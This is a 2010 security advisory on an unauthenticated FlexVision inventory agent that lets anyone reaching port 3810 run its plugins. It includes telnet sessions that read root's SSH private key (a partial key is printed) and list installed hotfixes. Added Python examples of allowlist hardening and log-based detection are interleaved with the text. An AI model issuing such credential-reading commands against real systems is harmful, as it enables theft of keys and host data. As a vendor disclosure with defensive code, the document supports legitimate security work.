FlexVision Agent Listener Information Disclosure

🗓️ 24 Dec 2010 00:00:00 · Reported by Victor Ribeiro Hora · Type: packetstorm · 🔗 packetstormsecurity.com


=====[ Tempest Security Intelligence - Advisory #02 / 2010 ]=============  
  
Information Disclosure Vulnerability in FlexVision Agent Listener  
-----------------------------------------------------------------  
  
  
Authors: Victor Ribeiro Hora <victor *SPAM* tempest.com.br  
<http://tempest.com.br>>  
Tempest Security Intelligence - Brazil  
  
  
=====[ Table of Contents ]=================================  
  
1. Overview  
2. Detailed description  
3. Additional context & Solutions  
4. References  
5. Thanks  
  
  
=====[ Overview ]======================================  
  
* System affected: FlexVision Agent Listener 1.3 for Windows, Linux and  
Solaris  
(other versions may be vulnerable)  
  
* Release date: 22 October 2010  
  
* Impact: Successful exploitation of this vulnerability may lead to  
remote server sensitive information disclosure.  
  
FlexVision [1] claims to be an IT service focused on hardware and  
software management, offering features like capacity planning, SLA  
monitoring and systems inventory. The service is used by several major  
companies in Brazil, including banking, telecom, energy, health and  
independent product sectors.  
  
The vulnerability was found in the inventory agent listener or "fval".  
Exploitation of this weakness does not require any authentication and  
may lead to remote disclosure of sensitive information from the server  
running the agent.  
  
Specifically, an attacker can download non-binary files, and list  
running services, running processes and installed software. It seems  
there is some active filtering for known sensitive data, but other  
sensitive information may leak.  
  
=====[ Detailed description ]================================  
  
FlexVision Inventory service has several agents (servers) to collect  
data from different platforms and send them to a central console on the  
network. These agents are installed on the hardware to be monitored and  
listen for incoming client connections.  
  
One of the agents that was analyzed is the "FlexVision Actions Listener  
1.3 for Linux", used for the inventory of Linux systems. This agent is  
executed by a Linux binary called "fval" started at boot time through an  
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a  
chdir() to /opt/flex/plugins, then it opens a socket listening for  
connections on port 3810/TCP in daemon mode.  
  
As soon as the TCP Three-Way Handshake is completed, the agent keeps  
waiting for "commands" to perform the various inventory functions. These  
commands are interpreted as internal functions of the fval binary, such  
as help, version, exit or run.   
  
Specifically, the run function expects a parameter. We noted that this  
parameter is a bash script file in the /opt/flex/plugins directory. This  
script is executed by the fval binary, and the output of the script is  
returned on the same TCP connection to the central console application.  
These commands are normally sent from a central console to the monitored  
agent.  
  
Because the connection is neither authenticated nor encrypted in any way,  
any computer that can reach port 3810/TCP on an agent can send commands  
that the agent will execute.  
  
Although the agent uses an active filter for some well-known sensitive  
data (for example, password hashes in the "shadow" file), it is still  
possible to obtain other sensitive data that is harder to predict. Some  
special characters we tested were also filtered, such as '*', ';' and  
'>', as well as white space, tabs and other delimiters used by bash and  
other shells.  
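The advisory describes a character denylist ('*', ';', '>', white space) applied to the arguments of the "run" command, which still lets a path such as /root/.ssh through because '/' and '.' are not on the list. The following is an added illustration, not FlexVision's code, of how a plugin listener of this kind would be hardened on the design level: the caller must come from an approved console network (the control version 1.4 is said to add), the plugin name must be in a fixed registry rather than derived from client input, and each plugin declares the number and shape of the arguments it accepts. The registry entries, the console network and the `svcstatus.sh` plugin are constructed for the example; only `hotfix.exe`, the plugin directory and port 3810 come from the advisory.

```python
import re
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Allowlist for arguments: bare identifiers only, no path separators or shell syntax.
SAFE_ARG = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


@dataclass(frozen=True)
class PluginPolicy:
    max_args: int
    arg_pattern: re.Pattern = SAFE_ARG   # every argument must fully match


# Constructed registry (not FlexVision's): the plugins a console may call and
# the argument shape each accepts. hotfix.exe is named in the advisory and
# takes no arguments; svcstatus.sh is a hypothetical plugin taking one
# service name.
PLUGIN_REGISTRY = {
    "hotfix.exe": PluginPolicy(max_args=0),
    "svcstatus.sh": PluginPolicy(max_args=1,
                                 arg_pattern=re.compile(r"^[A-Za-z0-9_-]{1,32}$")),
}

# Constructed console network; a real deployment would list its console hosts.
CONSOLE_NETWORKS = [ip_network("192.168.100.0/24")]


@dataclass
class Decision:
    allowed: bool
    reason: str
    plugin: str = ""
    args: list = field(default_factory=list)


def denylist_filter(arg: str) -> bool:
    """The filtering style the advisory reports: reject only known-bad characters.
    '/' and '.' are not on the list, so an argument such as /root/.ssh passes."""
    return not any(c in "*;>" or c.isspace() for c in arg)


def authorize(request_line: str, source_ip: str) -> Decision:
    """Decide whether one FVAL-style request line from source_ip may run."""
    # 1. Only approved consoles may talk to the listener at all.
    src = ip_address(source_ip)
    if not any(src in net for net in CONSOLE_NETWORKS):
        return Decision(False, "source not an approved console")

    # 2. Parse "run <plugin> [args...]"; other commands are not dispatched here.
    parts = request_line.strip().split()
    if len(parts) < 2 or parts[0].lower() != "run":
        return Decision(False, "unsupported command")
    plugin, args = parts[1], parts[2:]

    # 3. The plugin must be registered; never build a path from client input.
    policy = PLUGIN_REGISTRY.get(plugin)
    if policy is None:
        return Decision(False, f"plugin not registered: {plugin}")

    # 4. Argument count and shape are fixed per plugin (allowlist, not denylist).
    if len(args) > policy.max_args:
        return Decision(False, "too many arguments")
    for a in args:
        if not policy.arg_pattern.fullmatch(a):
            return Decision(False, f"argument rejected: {a!r}")

    return Decision(True, "ok", plugin, args)


if __name__ == "__main__":
    # The advisory's request: passes the denylist, fails the allowlist design.
    print(denylist_filter("/root/.ssh"))
    print(authorize("run symonfile.sh /root/.ssh id_rsa", "192.168.100.10"))
    print(authorize("run hotfix.exe", "10.0.0.5"))
```

The point of the contrast is that `denylist_filter` accepts the advisory's argument because nothing in "/root/.ssh" is on the list, while `authorize` rejects the same request twice over: `symonfile.sh` is not a registered plugin, and even a registered plugin would refuse a path-shaped argument.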
  
  
The following is an example of the recovery of a private SSH RSA key  
file that belongs to the root user on a Linux server:  
  
-----------------------------------------------------------------------  
  
vrh@victim01:~$ telnet 192.168.1.1 3810  
Trying 192.168.1.1...  
Connected to 192.168.1.1.  
Escape character is '^]'.  
FVAL>run symonfile.sh /root/.ssh id_rsa  
-----BEGIN RSA PRIVATE KEY-----  
MIIEogIBAAKCAQEA3wKpWZ0xgmIWX4JVb72wt5STGdhr2x0whvY25hhNfI9zpNIG  
eV0zRXy4hbVqRvcJVu3+Ho6ZyXIg8bVzljFJdx/anBs5KLrlvfoMDrgwNWtp8Slz  
Fuhfp7ej0wr57ZRyKq4imz3vvle24SRtROymSMDCtolbY4wZFCRu6JJ+3jAVqlxJ  
9YMdVqL7BoF0Nbp+s7FqIdbpwwOtcS0PpprvWTbFcQ+z3ReN7B7SybZTkuZPD56o  
z1QtnzhgnVFHBD3TPXPorKf42uuDeW3twFKYlFOuSmz46tKCsbBoM8TBPNtYCvAe  
3G7Aj0R/jvBdL9+hz/cG+riwL0NYTSe7uTO4kQIBIwKCAQATHXw64ZaHhMAW0Kg8  
xx3Gl7TWVGEEJxLJvVUpqk/I2RiKeGb0dbPwA2BF+ZtlKx4Ow/E10bVpCchPO3BO  
s8R37MmYWhrXmv2/05qiLQtySwkUq8gJRx4kUZGzAPDZ2YYg6lq82WxSJMaIU5RW  
XW1WsW/GgM1RrOw07S4T70yz9VUvFo4M5m7GMP0AjffvJv8dhABNRPV1uzBGqjyV  
  
-----------------------------------------------------------------------  
  
Just like the Linux fval, the Windows version also makes it possible to  
dump any non-binary file. It is worth noting that because fval always  
runs as a privileged user (Administrator/root), all system files are  
accessible and most of them are readable.  
  
Windows hosts behave similarly. As soon as the Agent is installed, it is  
registered as a System Service and runs at boot time. This service runs  
the fval binary located at %SystemDrive%\%ProgramFiles%\Flexvision.  
fval will then run any file in the  
%SystemDrive%\%ProgramFiles%\Flexvision\Plugins directory.  
  
By default, the Windows fval ships with several 32-bit Portable  
Executable (.EXE) files that provide inventory data to the central  
console. The most interesting is the hotfix.exe file, which lists all the  
HotFixes installed on the host:  
  
-----------------------------------------------------------------------  
  
vrh@victim01:~$ telnet 192.168.1.2 3810  
Trying 192.168.1.2...  
Connected to 192.168.1.2.  
Escape character is '^]'.  
FVAL>run hotfix.exe  
Hot Fix ID.75=File 1  
Service pack afetado.75=KB956801  
Instalado por.75=  
Descricao.76=  
Hot Fix ID.76=File 1  
Service pack afetado.76=KB956806  
Instalado por.76=  
Descricao.77=  
Hot Fix ID.77=File 1  
Service pack afetado.77=KB956848  
Instalado por.77=  
  
-----------------------------------------------------------------------  
  
With that sort of info it would be possible to plan and execute a much  
more precise attack against the host.  
  
=====[ Additional context & Solutions ]============================  
  
As usual [2], we contacted the vendor. After some weeks, they released  
version 1.4, which uses source IP based access control (a whitelist  
policy) and a static key for authentication, but nothing that addresses  
the actual problem: there is still no strong authentication scheme and  
no encryption of client-server traffic. Version 2.0 was just released;  
the vendor states that this version uses encrypted client-server  
communication, but we have not yet been able to test it. After waiting a  
few months, FlexVision did not provide us with a public URL for an  
actual fix addressing this problem that we could attach to this  
publication.  
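Until an agent version with real authentication and encryption is deployed, the practical control is the one version 1.4 approximates on the host: only known console addresses should ever open a connection to 3810/TCP, and any other client is worth an alert. The following added example, which is not part of the advisory or the vendor's tooling, runs that check over constructed iptables-style LOG lines: it counts new TCP connections (SYN) to the agent port from sources outside the console networks, per agent host. The log format is simplified to the fields the check needs, and the addresses, hostnames and console network are all constructed.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

FVAL_PORT = 3810   # listener port named in the advisory

# Constructed, simplified iptables LOG lines (not captured traffic). Only the
# SRC/DST/PROTO/DPT fields and the TCP flag words at the end are used.
SAMPLE_LOG = """\
Oct 22 10:01:02 agent01 kernel: fw-in: IN=eth0 OUT= SRC=192.168.100.10 DST=192.168.1.1 PROTO=TCP SPT=40211 DPT=3810 SYN
Oct 22 10:01:09 agent01 kernel: fw-in: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP SPT=51000 DPT=3810 SYN
Oct 22 10:01:10 agent01 kernel: fw-in: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP SPT=51000 DPT=3810 ACK
Oct 22 10:02:30 agent02 kernel: fw-in: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.1.2 PROTO=TCP SPT=51002 DPT=3810 SYN
Oct 22 10:03:00 agent01 kernel: fw-in: IN=eth0 OUT= SRC=10.0.0.7 DST=192.168.1.1 PROTO=TCP SPT=22 DPT=22 SYN
"""

# Constructed console network; in practice, the addresses of the central console(s).
CONSOLE_NETWORKS = [ip_network("192.168.100.0/24")]

LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+)"
    r"(?P<flags>(?: [A-Z]+)*)"
)


def parse_tcp_records(lines):
    """Yield (src, dst, dport, flags) for every TCP LOG line that matches."""
    for line in lines:
        m = LOG_RE.search(line)
        if m is None:
            continue
        yield m["src"], m["dst"], int(m["dpt"]), set(m["flags"].split())


def unexpected_fval_clients(lines, console_networks=CONSOLE_NETWORKS):
    """Count new connections to the agent port from non-console sources.

    Returns a Counter keyed by (source, agent) so repeated attempts from the
    same client against the same agent accumulate. Only SYN records count,
    so one connection is counted once, not once per packet.
    """
    hits = Counter()
    for src, dst, dport, flags in parse_tcp_records(lines):
        if dport != FVAL_PORT or "SYN" not in flags:
            continue
        if any(ip_address(src) in net for net in console_networks):
            continue   # an approved console; expected traffic
        hits[(src, dst)] += 1
    return hits


if __name__ == "__main__":
    for (src, dst), n in unexpected_fval_clients(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT: {src} opened {n} connection(s) to fval agent {dst}:{FVAL_PORT}")
```

Two of the five constructed lines raise an alert: the SYN from 10.0.0.5 to each agent. The console's own connection and the ACK packet of an already counted session do not, and the port-22 line is ignored because it is not the agent port.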
  
=====[ Thanks ]========================================  
  
- Tempest Security Intelligence [3] - Tempest MSS Team  
- Evandro Curvelo Hora <evandro *SPAM* tempest.com.br  
<http://tempest.com.br>>  
- Marco "Kiko" Carnut <kiko *SPAM* tempest.com.br <http://tempest.com.br>>  
- Cristiano Lincoln Mattos <lincoln *SPAM* tempest.com.br  
<http://tempest.com.br>>  
- Aldo Albuquerque <aldo *SPAM* tempest.com.br <http://tempest.com.br>>  
  
=====[ References ]======================================  
  
[1] http://www.flexvision.com.br/  
[2] http://www.cert.org/kb/vul_disclosure.html  
[3] http://www.tempest.com.br/  
  
===================================================  
  
--   
Victor Ribeiro Hora <[email protected]>  
Network Security Analyst & Security Baselines development  
Tempest Security Intelligence  
www.tempest.com.br  
  
